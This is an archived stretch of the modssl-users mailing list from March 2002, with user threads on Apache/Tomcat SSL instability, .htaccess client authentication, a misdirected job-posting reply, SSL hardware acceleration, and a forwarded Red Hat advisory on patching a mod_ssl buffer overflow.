>Mod_ssl isn't the problem.... It works fine. But when you also add JSP
>functionality (tomcat / WARP), the server becomes instable. It appears to be
>crashing when multiple requests for one or more JSPs are send to the server
>at the same time.
>
>Apache+mod_ssl works ok
>Apache+tomcat works ok
>
>but
>
>Apache+mod_ssl+tomcat works but is very instable.
>
>I actually changed to iPlanet ($ 1500) because of this.
>
>Apache 2.0 will have SSL integrated. Maybe the problem will be solved
>then... Personally I have good feelings about this because the way threading
>is handled is completely revised.
>
>Are you only getting an error message in the log and does everything work?
>Or doesn't it...
>
>Patrick
>----- Original Message -----
>From: "cesar" 
>To: 
>Sent: Thursday, March 07, 2002 12:39 PM
>Subject: mod_ssl
>
>
> > Hello Patrick
> >
> > I have a problem with apache+mod_ssl, when i execute any pages .jsp in
> > my web server(windows 2000) i receive this error log:
> >
> > You are using mod_ssl under Win32.This> combination is *NOT* officially
> > supported. Use it at your own risk!
> >
> > What is this??
> > Is there a version stable of the apache+ssl for windows?
> >
> > Tks.
> >
> > Cesar
> >
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl) www.modssl.org
>User Support Mailing List modssl-users@modssl.org
>Automated List Manager majordomo@modssl.org


Chat with friends online, try MSN Messenger: Click Here
______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org


contact me directly at markmath@taggis.com. I might be able to help

Mark 
    

Thank you for sharing that with the group.

-P

------_=_NextPart_001_01C1C64A.F104AEA0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 05:14:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA18848; Fri, 8 Mar 2002 03:59:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns01.taggis.com id DAA18705; Fri, 8 Mar 2002 03:57:29 +0100 (MET) Received: from taggis.com (hagar.taggis.com [10.0.0.40]) by ns01.taggis.com (8.11.6+Sun/8.9.1) with ESMTP id g282dKn17827 for ; Thu, 7 Mar 2002 18:39:20 -0800 (PST) Message-ID: <3C882700.28453C8B@taggis.com> Date: Thu, 07 Mar 2002 18:50:40 -0800 From: "Mark J. Matheson" Organization: Howell Spatial Industries X-Mailer: Mozilla 4.7 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Job openings References: Content-Type: multipart/mixed; boundary="------------47394E1FA1819278FE9B12D5" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Mark J. Matheson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. --------------47394E1FA1819278FE9B12D5 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit "Paul G. Weiss" wrote:
  
-----Original Message-----
From: Mark J. Matheson [mailto:markmath@taggis.com]
Sent: Thursday, March 07, 2002 9:40 PM
To: modssl-users@modssl.org
Subject: Re: Job openings
 
avijeet banerjee wrote:
 
 

 We have a requirement for a developer(senior) in a  large software development organization. The person should have expertise in C , apache mods , Oracle Pl/sql and java/jsp experience would be an added advantage.Please send resumes ASAP.thanks

Avijeet
 
 
 
 
 
 
 
 

Avijeet Banerjee
>From: "Patrick Willart" 
>Reply-To: modssl-users@modssl.org
>To: "cesar" 
>Subject: Re: mod_ssl
>Date: Thu, 7 Mar 2002 13:34:41 -0800
>
>Hi Cesar,
>
>Mod_ssl isn't the problem.... It works fine. But when you also add JSP
>functionality (tomcat / WARP), the server becomes instable. It appears to be
>crashing when multiple requests for one or more JSPs are send to the server
>at the same time.
>
>Apache+mod_ssl works ok
>Apache+tomcat works ok
>
>but
>
>Apache+mod_ssl+tomcat works but is very instable.
>
>I actually changed to iPlanet ($ 1500) because of this.
>
>Apache 2.0 will have SSL integrated. Maybe the problem will be solved
>then... Personally I have good feelings about this because the way threading
>is handled is completely revised.
>
>Are you only getting an error message in the log and does everything work?
>Or doesn't it...
>
>Patrick
>----- Original Message -----
>From: "cesar" 
>To: 
>Sent: Thursday, March 07, 2002 12:39 PM
>Subject: mod_ssl
>
>
> > Hello Patrick
> >
> > I have a problem with apache+mod_ssl, when i execute any pages .jsp in
> > my web server(windows 2000) i receive this error log:
> >
> > You are using mod_ssl under Win32.This> combination is *NOT* officially
> > supported. Use it at your own risk!
> >
> > What is this??
> > Is there a version stable of the apache+ssl for windows?
> >
> > Tks.
> >
> > Cesar
> >
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl) www.modssl.org
>User Support Mailing List modssl-users@modssl.org
>Automated List Manager majordomo@modssl.org


Chat with friends online, try MSN Messenger: Click Here
______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org


contact me directly at markmath@taggis.com. I might be able to help

Mark

Thank you for sharing that with the group.

-P


sorry, to fast on the trigger
  --------------47394E1FA1819278FE9B12D5 Content-Type: text/x-vcard; charset=us-ascii; name="markmath.vcf" Content-Description: Card for Mark J. Matheson Content-Disposition: attachment; filename="markmath.vcf" Content-Transfer-Encoding: 7bit begin:vcard n:Matheson;Mark J. tel;cell:503.803.5712 tel;fax:503.650.5066 tel;work:503.722.7416 x-mozilla-html:FALSE url:www.GISjobs.com.au org:Howell Spatial Industries;USA Branch adr:;;855 Molalla Ave.;Oregon City;Or;97045;USA version:2.1 email;internet:markmath@taggis.com title:Executive Manager fn:Mark J. Matheson end:vcard --------------47394E1FA1819278FE9B12D5-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 05:14:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA18741; Fri, 8 Mar 2002 03:58:02 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mail.arity.com id DAA18657; Fri, 8 Mar 2002 03:57:04 +0100 (MET) Received: (qmail 12485 invoked from network); 8 Mar 2002 02:57:03 -0000 Received: from image.arity.com (65.204.1.131) by mail.arity.com with SMTP; 8 Mar 2002 02:57:03 -0000 Received: by image.arity.com with Internet Mail Service (5.5.2653.19) id ; Thu, 7 Mar 2002 22:05:19 -0500 Message-ID: From: "Paul G. Weiss" To: "'modssl-users@modssl.org'" Subject: RE: Job openings Date: Thu, 7 Mar 2002 22:05:11 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1C64E.0F7ACF60" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Paul G. Weiss" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1C64E.0F7ACF60 Content-Type: text/plain OK, well that's what I call putting your foot in your mouth! Apologies to all. -P -----Original Message----- From: Paul G. Weiss Sent: Thursday, March 07, 2002 9:43 PM To: 'modssl-users@modssl.org' Subject: RE: Job openings -----Original Message----- From: Mark J. Matheson [mailto:markmath@taggis.com] Sent: Thursday, March 07, 2002 9:40 PM To: modssl-users@modssl.org Subject: Re: Job openings avijeet banerjee wrote: We have a requirement for a developer(senior) in a large software development organization. The person should have expertise in C , apache mods , Oracle Pl/sql and java/jsp experience would be an added advantage.Please send resumes ASAP.thanks Avijeet Avijeet Banerjee >From: "Patrick Willart" >Reply-To: modssl-users@modssl.org >To: "cesar" , >Subject: Re: mod_ssl >Date: Thu, 7 Mar 2002 13:34:41 -0800 > >Hi Cesar, > >Mod_ssl isn't the problem.... It works fine. But when you also add JSP >functionality (tomcat / WARP), the server becomes instable. It appears to be >crashing when multiple requests for one or more JSPs are send to the server >at the same time. > >Apache+mod_ssl works ok >Apache+tomcat works ok > >but > >Apache+mod_ssl+tomcat works but is very instable. > >I actually changed to iPlanet ($ 1500) because of this. > >Apache 2.0 will have SSL integrated. Maybe the problem will be solved >then... Personally I have good feelings about this because the way threading >is handled is completely revised. > >Are you only getting an error message in the log and does everything work? >Or doesn't it... > >Patrick >----- Original Message ----- >From: "cesar" >To: >Sent: Thursday, March 07, 2002 12:39 PM >Subject: mod_ssl > > > > Hello Patrick > > > > I have a problem with apache+mod_ssl, when i execute any pages .jsp in > > my web server(windows 2000) i receive this error log: > > > > You are using mod_ssl under Win32.This> combination is *NOT* officially > > supported. Use it at your own risk! > > > > What is this?? > > Is there a version stable of the apache+ssl for windows? > > > > Tks. > > > > Cesar > > > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org _____ Chat with friends online, try MSN Messenger: Click Here ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org contact me directly at markmath@taggis.com. I might be able to help Mark Thank you for sharing that with the group. -P ------_=_NextPart_001_01C1C64E.0F7ACF60 Content-Type: text/html

OK, well that's what I call putting your foot in your mouth!  Apologies to all.
-P
-----Original Message-----
From: Paul G. Weiss
Sent: Thursday, March 07, 2002 9:43 PM
To: 'modssl-users@modssl.org'
Subject: RE: Job openings

 
-----Original Message-----
From: Mark J. Matheson [mailto:markmath@taggis.com]
Sent: Thursday, March 07, 2002 9:40 PM
To: modssl-users@modssl.org
Subject: Re: Job openings

avijeet banerjee wrote:

 
 
 We have a requirement for a developer(senior) in a  large software development organization. The person should have expertise in C , apache mods , Oracle Pl/sql and java/jsp experience would be an added advantage.Please send resumes ASAP.thanks

Avijeet
 
 
 
 
 
 
 
 

Avijeet Banerjee
>From: "Patrick Willart" 
>Reply-To: modssl-users@modssl.org
>To: "cesar" 
>Subject: Re: mod_ssl
>Date: Thu, 7 Mar 2002 13:34:41 -0800
>
>Hi Cesar,
>
>Mod_ssl isn't the problem.... It works fine. But when you also add JSP
>functionality (tomcat / WARP), the server becomes instable. It appears to be
>crashing when multiple requests for one or more JSPs are send to the server
>at the same time.
>
>Apache+mod_ssl works ok
>Apache+tomcat works ok
>
>but
>
>Apache+mod_ssl+tomcat works but is very instable.
>
>I actually changed to iPlanet ($ 1500) because of this.
>
>Apache 2.0 will have SSL integrated. Maybe the problem will be solved
>then... Personally I have good feelings about this because the way threading
>is handled is completely revised.
>
>Are you only getting an error message in the log and does everything work?
>Or doesn't it...
>
>Patrick
>----- Original Message -----
>From: "cesar" 
>To: 
>Sent: Thursday, March 07, 2002 12:39 PM
>Subject: mod_ssl
>
>
> > Hello Patrick
> >
> > I have a problem with apache+mod_ssl, when i execute any pages .jsp in
> > my web server(windows 2000) i receive this error log:
> >
> > You are using mod_ssl under Win32.This> combination is *NOT* officially
> > supported. Use it at your own risk!
> >
> > What is this??
> > Is there a version stable of the apache+ssl for windows?
> >
> > Tks.
> >
> > Cesar
> >
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl) www.modssl.org
>User Support Mailing List modssl-users@modssl.org
>Automated List Manager majordomo@modssl.org


Chat with friends online, try MSN Messenger: Click Here
______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org


contact me directly at markmath@taggis.com. I might be able to help

Mark 
    

Thank you for sharing that with the group.

-P

------_=_NextPart_001_01C1C64E.0F7ACF60-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 07:47:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA09626; Fri, 8 Mar 2002 07:46:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id HAA09613; Fri, 8 Mar 2002 07:45:57 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 76335BD2A; Fri, 8 Mar 2002 07:46:54 +0100 (CET) Date: Fri, 8 Mar 2002 07:46:54 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: .htaccess not processed with client authentication Message-ID: <20020308064654.GA19587@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <16610159.1015552002930.JavaMail.root@webmaill05> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <16610159.1015552002930.JavaMail.root@webmaill05> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, Mar 08, 2002 at 09:46:42AM +0800, Angus Lee wrote: > Hi, > > > Try to put all these directives in httpd.conf file and > > also try to put the SSLRequire directive as follows > > But I want each user to set their client authentication access control to their directory. > > Is there any bug with previous versions of mod_ssl which would make client authentication fails? > Not in any of the recent versions ... but since you seem to be wanting .htaccess (I missed the beginning of this question) - have you made sure that AllowOverride allows the usage of .htaccess within those directories? http://httpd.apache.org/docs/mod/core.html#allowoverride vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 08:04:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA10328; Fri, 8 Mar 2002 08:03:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailhost.cowan.edu.au id IAA10323; Fri, 8 Mar 2002 08:02:54 +0100 (MET) Received: from chmail.ch.ecu.edu.au (chmail.ch.ecu.edu.au [139.230.140.10]) by mailhost.cowan.edu.au (8.11.3/8.11.3) with ESMTP id g2872l711810 for ; Fri, 8 Mar 2002 15:02:47 +0800 (WST) Received: from Churchlands Domain-MTA by chmail.ch.ecu.edu.au with Novell_GroupWise; Fri, 08 Mar 2002 15:02:39 +0800 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Fri, 08 Mar 2002 15:01:31 +0800 From: "Chris Cooper" To: Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Chris Cooper" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users - - - - - - Chris Cooper c.cooper@ecu.edu.au Student Service Centre webmaster@ecu.edu.au Edith Cowan University http://www.ecu.edu.au/ Pearson Street Tel: +61 8 9273 8652 Churchlands Fax: +61 8 9273 8000 - - - - - - ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 11:11:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA18998; Fri, 8 Mar 2002 11:10:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id LAA18984; Fri, 8 Mar 2002 11:09:49 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g28A99v10014 for ; Fri, 8 Mar 2002 10:09:30 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Fri, 8 Mar 2002 10:09:07 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066E52@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: new rpm for apache-mod_ssl? Date: Fri, 8 Mar 2002 10:09:03 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C1C689.46577340" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C1C689.46577340 Content-Type: text/plain; charset="iso-8859-1" I've attached the email notification from Red Hat about the latest rpm for mod_ssl (I did this in Outlook, so probably no-one else can read it). Unless you are running client certificates, there's no rush to put this on your system. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Evolution - A crutch for scientists who can't handle the existence of the creator. See "disproven scientific theories" and Romans 1:22. >-----Original Message----- >From: Rick Goyette [mailto:goyette@downbelow.pns.anl.gov] >Sent: 07 March 2002 16:02 >To: modssl-users@modssl.org >Subject: new rpm for apache-mod_ssl? > > >I am running apache-mod_ssl-1.3.20.2.8.4-2, and I like it very >much. It >is a complete package of apache and ssl, and, as it was packaged into a >RedHat rpm, was easy to install. However, the recent >security advisory >concerning the buffer overflow in mod_ssl (appended below) >demonstrates >my need for an update. I am unable to locate an rpm which >corrects this >problem. Is there another way to correct this, short of uninstalling >apache-mod_ssl and then installing apache-1.3.23 and >mod_ssl-2.8.7-1.3.23 serarately? > > INFORMATION BULLETIN > mod_ssl and Apache_SSL Modules Contain a Buffer Overflow > [CERT Vulnerability Note VU#234971] >March 6, 2002 00:00 GMT > Number >M-053 >_______________________________________________________________ >_____________ > >__ >PROBLEM: There is a remotely exploitable buffer overflow in two >modules > that implement the Secure Sockets Layer >(SSL) and Transport > Layer Security (TLS) protocol. >PLATFORM: mod_ssl in all versions prior to 2.8.7-1.3.23. > Apache-SSL in all version prior to >1.3.22+1.4.6. >DAMAGE: An attacker may be able to execute arbitrary code on the > system with the privileges of the ssl >module. >SOLUTION: Upgrade to mod_ssl 2.8.7 or Apache_SSL 1.3.22+1.46, or >apply > the patch provided by your vendor. >_______________________________________________________________ >_____________ > >__ >VULNERABILITY The risk is MEDIUM. To exploit the overflow, the server >must be >ASSESSMENT: configured to allow client certificates, and an attacker >must > obtain a carefully crafted client certificate that has >been > signed by a Certificate Authority (CA) which is trusted >by the server. > >-- >R. J. Goyette >Argonne National Laboratory >RJGoyette@anl.gov > >http://www.pns.anl.gov > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ------_=_NextPart_000_01C1C689.46577340 Content-Type: message/rfc822 Content-Description: [RHSA-2002:041-08] Updated mod_ssl packages available Message-ID: <200203080039.g280dBx01102@porkchop.redhat.com> From: bugzilla@redhat.com To: redhat-watch-list@redhat.com Cc: bugtraq@securityfocus.com, linux-security@redhat.com, security@redhat.com Subject: [RHSA-2002:041-08] Updated mod_ssl packages available Date: Fri, 8 Mar 2002 00:39:00 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) List-Help: List-Subscribe: , List-Unsubscribe: , Content-Type: text/plain; charset="iso-8859-1" --------------------------------------------------------------------- Red Hat, Inc. Red Hat Security Advisory Synopsis: Updated mod_ssl packages available Advisory ID: RHSA-2002:041-08 Issue date: 2002-03-01 Updated on: 2002-03-06 Product: Red Hat Linux Keywords: mod_ssl buffer overflow session cache Cross references: RHSA-2002:042 Obsoletes: RHSA-2001:126 --------------------------------------------------------------------- 1. Topic: Updated mod_ssl packages for Red Hat Linux 7, 7.1, and 7.2 are available which close a buffer overflow in mod_ssl. 2. Relevant releases/architectures: Red Hat Linux 7.0 - alpha, i386 Red Hat Linux 7.1 - alpha, i386, ia64 Red Hat Linux 7.2 - i386, ia64 3. Problem description: When session caching is enabled, mod_ssl will serialize SSL session variables to store them for later use. Unpatched versions of mod_ssl prior to version 2.8.7 which use the 'shm' or 'dbm' session caches would store session variables using a buffer with a fixed size, making it vulnerable to overflow. To exploit the overflow, the server must be configured to require client certificates, and an attacker must obtain a carefully crafted client certificate that has been signed by a Certificate Authority which is trusted by the server. If these conditions are met, it would be possible for an attacker to execute arbitrary code on the server. Red Hat Linux 6.2 and earlier releases which did not include the mod_ssl package are not vulnerable to this bug. Users who utilize client certificate authentication are strongly advised to upgrade or switch to shared memory session cache, shmcb, which is not vulnerable to this issue. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2002-0082 to this issue. 4. Solution: Before applying this update, make sure to apply all previously released errata relevant to your system. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via Red Hat Network. Many people find this an easier way to apply updates. To use Red Hat Network, launch the Red Hat Update Agent with the following command: up2date This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. After applying these updates, you will need to restart an active server by performing the following: /etc/rc.d/init.d/httpd restart This step must be performed manually to keep SSL-capable servers from stalling when the server's key is password-protected. 5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info): 6. RPMs required: Red Hat Linux 7.0: SRPMS: ftp://updates.redhat.com/7.0/en/os/SRPMS/mod_ssl-2.8.5-3.src.rpm alpha: ftp://updates.redhat.com/7.0/en/os/alpha/mod_ssl-2.8.5-3.alpha.rpm i386: ftp://updates.redhat.com/7.0/en/os/i386/mod_ssl-2.8.5-3.i386.rpm Red Hat Linux 7.1: SRPMS: ftp://updates.redhat.com/7.1/en/os/SRPMS/mod_ssl-2.8.5-3.src.rpm alpha: ftp://updates.redhat.com/7.1/en/os/alpha/mod_ssl-2.8.5-3.alpha.rpm i386: ftp://updates.redhat.com/7.1/en/os/i386/mod_ssl-2.8.5-3.i386.rpm ia64: ftp://updates.redhat.com/7.1/en/os/ia64/mod_ssl-2.8.5-3.ia64.rpm Red Hat Linux 7.2: SRPMS: ftp://updates.redhat.com/7.2/en/os/SRPMS/mod_ssl-2.8.5-4.src.rpm i386: ftp://updates.redhat.com/7.2/en/os/i386/mod_ssl-2.8.5-4.i386.rpm ia64: ftp://updates.redhat.com/7.2/en/os/ia64/mod_ssl-2.8.5-4.ia64.rpm 7. Verification: MD5 sum Package Name -------------------------------------------------------------------------- c48b531b44f2e1b24cd7135a0abeac56 7.0/en/os/SRPMS/mod_ssl-2.8.5-3.src.rpm cf0f60da9b3552aa3d25a7b758164b24 7.0/en/os/alpha/mod_ssl-2.8.5-3.alpha.rpm e823561b43670240862e7038293222c7 7.0/en/os/i386/mod_ssl-2.8.5-3.i386.rpm c48b531b44f2e1b24cd7135a0abeac56 7.1/en/os/SRPMS/mod_ssl-2.8.5-3.src.rpm cf0f60da9b3552aa3d25a7b758164b24 7.1/en/os/alpha/mod_ssl-2.8.5-3.alpha.rpm e823561b43670240862e7038293222c7 7.1/en/os/i386/mod_ssl-2.8.5-3.i386.rpm 547de3f8522fb0af6ea2d082de648c7c 7.1/en/os/ia64/mod_ssl-2.8.5-3.ia64.rpm 608249d2e6edecb929e679129e41a1c5 7.2/en/os/SRPMS/mod_ssl-2.8.5-4.src.rpm b7c91618cfb9110ce1ad620b9df05ab7 7.2/en/os/i386/mod_ssl-2.8.5-4.i386.rpm 1a8fc12f84ed55561a305d47269d312f 7.2/en/os/ia64/mod_ssl-2.8.5-4.ia64.rpm These packages are GPG signed by Red Hat, Inc. for security. Our key is available at: http://www.redhat.com/about/contact/pgpkey.html You can verify each package with the following command: rpm --checksig If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: rpm --checksig --nogpg 8. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0082 http://marc.theaimsgroup.com/?l=apache-modssl&m=101449247201254 http://online.securityfocus.com/archive/1/258646 Copyright(c) 2000, 2001, 2002 Red Hat, Inc. _______________________________________________ Redhat-watch-list mailing list To unsubscribe, visit: https://listman.redhat.com/mailman/listinfo/redhat-watch-list ------_=_NextPart_000_01C1C689.46577340-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 11:15:26 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA19171; Fri, 8 Mar 2002 11:14:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id LAA19144; Fri, 8 Mar 2002 11:13:50 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id D1A904CE695; Fri, 8 Mar 2002 11:13:49 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g28A0iS85766; Fri, 8 Mar 2002 11:00:44 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id XAA26777; Thu, 7 Mar 2002 23:07:35 +0100 (MET) Date: Thu, 7 Mar 2002 23:07:35 +0100 (MET) Message-Id: <200203072207.XAA26777@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] HTTPS doesn't work (PR#669) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Mar 07, 2002 at 08:03:08PM +0100, modssl-bugdb@modssl.org wrote: > Full_Name: Carmen Shinzato > Version: 2.8.7 > OS: Solaris 2.7 > Submission from: (NULL) (161.196.99.99) > > > We have installed Apache 1.3.23 with Openssl 0.9.6b and mod_ssl 2.8.7, The HTTP > protocol works well at port 8003 but the HTTPS doesn't work at port 8443, the > error is: access denied to www.movilnet.com.ve:8443. > > For testing the HTTPS protocol we did the following: > > openssl-0.9.6b/apps/openssl s_client -connect localhost:8443 -state -debug > > And the result was: > > warning, not much extra random data, consider using the -rand option > CONNECTED(00000003) > SSL_connect:before/connect initialization > write to 00156490 [00158608] (130 bytes => 130 (0x82)) > 0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00 ......W... ..... > 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05 .........f...... > 0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00 ................ > 0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00 .e..d..c..b..a.. > 0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14 `...........@... > 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ > 0060 - 00 80 bf d6 ab 1b 5d 34-56 45 03 7f c1 8c 77 9a ......]4VE....w. > 0070 - bd 05 db 04 f0 13 17 e0-66 55 cd 9d a2 d9 c6 6c ........fU.....l > 0080 - b4 df .. > SSL_connect:SSLv2/v3 write client hello A > read from 00156490 [0015DB68] (7 bytes => 7 (0x7)) > 0000 - 3c 21 44 4f 43 54 59 from visp.engelschall.com id MAA23542; Fri, 8 Mar 2002 12:13:41 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 3DC3C4CE697; Fri, 8 Mar 2002 12:13:40 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g28BCk086934; Fri, 8 Mar 2002 12:12:46 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from vonemailsweep1.voneaccount.com id LAA19278; Fri, 8 Mar 2002 11:16:04 +0100 (MET) Received: from vonewpnotes (unverified) by vonemailsweep1.voneaccount.com (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Fri, 8 Mar 2002 10:17:20 +0000 Subject: RE: SSL Hardware acceleration questions . . . To: modssl-users@modssl.org From: mike.innes@Oneaccount.com Date: Fri, 8 Mar 2002 10:15:58 +0000 Message-ID: X-MIMETrack: Serialize by Router on VirginOneAcc_2/Virgin Direct/GB(Release 5.0.8 |June 18, 2001) at 03/08/2002 10:15:59 AM MIME-Version: 1.0 Content-type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: mike.innes@Oneaccount.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Lynn, Thanx for your reply - I don't know if Oracle iAS (which uses Apache/MOD_SSL/OpenSSL) uses the engine version, unfortunately as it is a packaged product recompilation is not possible, I'll bung a call into Oracle. How do I identify if the engine version is in use? (I'll have a look at the docs) How much benifit was the card? Mikey lgazis on 07/03/2002 21:48:29 Please respond to modssl-users@modssl.org To: "'modssl-users@modssl.org'" cc: Subject: 